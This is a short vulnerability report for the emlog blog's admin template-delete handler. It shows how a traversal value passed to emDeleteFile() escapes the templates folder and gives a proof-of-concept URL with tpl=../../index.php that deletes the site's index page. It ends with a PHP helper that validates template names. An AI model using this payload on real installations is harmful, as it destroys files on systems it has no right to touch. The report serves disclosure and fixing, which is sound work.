Vulnerability in admin/template.php line 67:

```php
if ($action == 'del') {
    LoginAuth::checkToken();
    // addslashes() only escapes quotes, backslashes and NUL; "../" passes through unchanged
    $tplName = isset($_GET['tpl']) ? addslashes($_GET['tpl']) : '';
    $nonce_templet = Option::get('nonce_templet');
    if ($tplName === $nonce_templet) {
        emMsg('您不能删除正在使用的模板');
    }
    if (true === emDeleteFile(TPLS_PATH . $tplName)) {
        emDirect("./template.php?activate_del=1#tpllib");
    } else {
        emDirect("./template.php?error_a=1#tpllib");
    }
}
```

`if (true === emDeleteFile(TPLS_PATH . $tplName))`

Tracking the emDeleteFile function:

```php
function emDeleteFile($file) {
    if (empty($file)) return false;
    // A regular file is unlinked directly
    if (@is_file($file)) return @unlink($file);
    $ret = true;
    // Otherwise treat the path as a directory and delete its contents recursively
    if ($handle = @opendir($file)) {
        while ($filename = @readdir($handle)) {
            if ($filename == '.' || $filename == '..') continue;
            if (!emDeleteFile($file . '/' . $filename)) $ret = false;
        }
    } else {
        $ret = false;
    }
    @closedir($handle);
    if (file_exists($file) && !rmdir($file)) {
        $ret = false;
    }
    return $ret;
}
```

The character sequence “../” is unrestricted. Log in to the management background and view `/admin/template.php?action=del&tpl=../../index.php&token=U login token`!

POC:

```
/emlog/admin/template.php?action=del&tpl=../../index.php&token={U login token}
```
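One way to constrain the `tpl` value before it reaches `emDeleteFile()`, as an added example that is not part of the original report and not emlog's own code. `resolveTemplateDir()` is a hypothetical helper, the allowed character set for template names is an assumption, and the directory layout is constructed for the demonstration.

```php
<?php
// Added example, not emlog's code. resolveTemplateDir() is a hypothetical helper.

/**
 * Return the canonical path of a template directory directly under $tplsPath,
 * or null if $tplName does not name one.
 */
function resolveTemplateDir(string $tplsPath, string $tplName): ?string
{
    // Assumption: a template name is one path component made of these characters.
    // This rejects separators, dot segments and the empty string up front.
    if (!preg_match('/\A[A-Za-z0-9_-]+\z/', $tplName)) {
        return null;
    }
    $base = realpath($tplsPath);
    $target = realpath($tplsPath . DIRECTORY_SEPARATOR . $tplName);
    if ($base === false || $target === false || !is_dir($target)) {
        return null;
    }
    // After symlink resolution the target must be a direct child of the base.
    if (dirname($target) !== $base) {
        return null;
    }
    return $target;
}

// Constructed layout: <tmp>/site/index.php and <tmp>/site/content/templates/default/
$site = sys_get_temp_dir() . '/tpl_demo_' . bin2hex(random_bytes(4));
$tpls = $site . '/content/templates/';
mkdir($tpls . 'default', 0700, true);
touch($site . '/index.php');

foreach (['default', '../../index.php', '..', 'default/../..', ''] as $name) {
    $resolved = resolveTemplateDir($tpls, $name);
    printf("%-18s => %s\n", var_export($name, true), $resolved ?? 'rejected');
}

// Clean up the constructed directories.
unlink($site . '/index.php');
rmdir($tpls . 'default');
rmdir($site . '/content/templates');
rmdir($site . '/content');
rmdir($site);
```

Only the path returned by the helper would be handed to the delete routine; a `null` result is treated as an invalid request.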